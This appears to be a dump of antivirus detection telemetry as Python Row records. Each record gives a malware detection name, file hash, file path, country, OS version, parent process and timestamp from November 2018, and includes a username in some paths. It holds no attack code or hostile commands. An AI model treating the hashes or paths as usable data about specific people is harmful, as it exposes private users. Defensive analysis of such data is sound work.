  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:30:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104934-22002a9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104934-22002A9C', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T18:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gpgsplit.exe', filepath='\\\\?\\C:\\NIFPGA\\programs\\Vivado2013_4\\tps\\win32\\git-1.8.3\\bin\\gpgsplit.exe', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='284cc3e7c6877e694e4ee78d4c588d5a36daaacd6c15d583def03eb0f277da1f', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:51:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3e8859292c3ca10adaec120d3db73e981ca6bb12446a4327d03bbc4e1cc7883b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3E8859292C3CA10ADAEC120D3DB73E981CA6BB12446A4327D03BBC4E1CC7883B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3e8859292c3ca10adaec120d3db73e981ca6bb12446a4327d03bbc4e1cc7883b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:20:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:38:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vp.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\vp\\vp.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Crypt.XPACK.Gen.#M300.#R4115'), hash='17ccbea28d13c18a8cc8894ada580b57ba1e843aec3ffd213be2579433d7eb2d', metadata=Row(cmdline='-k BitStreamingDrv', country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:37:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Compressed\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:02:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0125904.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0125904.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa7464.35981\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa7464.35981\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T01:35:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2.exe', filepath='E:\\Box Files\\SPDMTK_FILES\\Box Installer\\Miracle Falcon Box\\2.exe', filesize=960000, name='W32/Sality.AG.#M1.#R1'), hash='252649fe13bd4f0e7baf7f453e19fe39432f294891d9b4941328b3af91194a6a', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-02T11:48:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061313-599d7d63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061313-599D7D63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054642-a55e7472', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054642-A55E7472', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T111829-14059/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:06:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:26:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173244-743af6f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5da4dbd8\\AVSCAN-20181102-173216-7023C812\\AVSCAN-20181102-173244-743AF6F0', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T09:32:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061959-4b82fba3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061959-4B82FBA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100215-ba1be9ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100026-ACE63AD3\\AVSCAN-20181102-100215-BA1BE9FF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053959-b558e156', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053959-B558E156', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061338-684c0111', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061338-684C0111', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143339-45984c05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49ad9593\\AVSCAN-20181102-143302-3F7CA0FA\\AVSCAN-20181102-143339-45984C05', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:33:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055615-fb21ba34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055615-FB21BA34', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115456-eeab2f09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7848c3b7\\AVSCAN-20181102-114047-40EC6109\\AVSCAN-20181102-115456-EEAB2F09', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:55:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051547-53eb7dd8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051547-53EB7DD8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rbppbigk.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\RBPpBIgK.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051742-97f73a25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051742-97F73A25', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124906-c7ac6225', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_823eb073\\AVSCAN-20181102-124752-BFF2FB5A\\AVSCAN-20181102-124906-C7AC6225', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T12:34:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052211-38d3cb3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052211-38D3CB3B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061336-67176048', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061336-67176048', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051503-3942c568', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051503-3942C568', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061446-90fb8482', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061446-90FB8482', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061909-2e1996aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061909-2E1996AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100236-bcca6f11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100026-ACE63AD3\\AVSCAN-20181102-100236-BCCA6F11', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053008-54a3f6c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053008-54A3F6C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051043-9ec63549', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051043-9EC63549', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060654-778c8326', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060654-778C8326', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061316-5b2dc4c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061316-5B2DC4C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061044-00a4b7ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061044-00A4B7CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053608-2bb521d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053608-2BB521D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061718-eb80ab7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061718-EB80AB7A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:16Z'), dt=datetime.date(2018, 11, 2)),
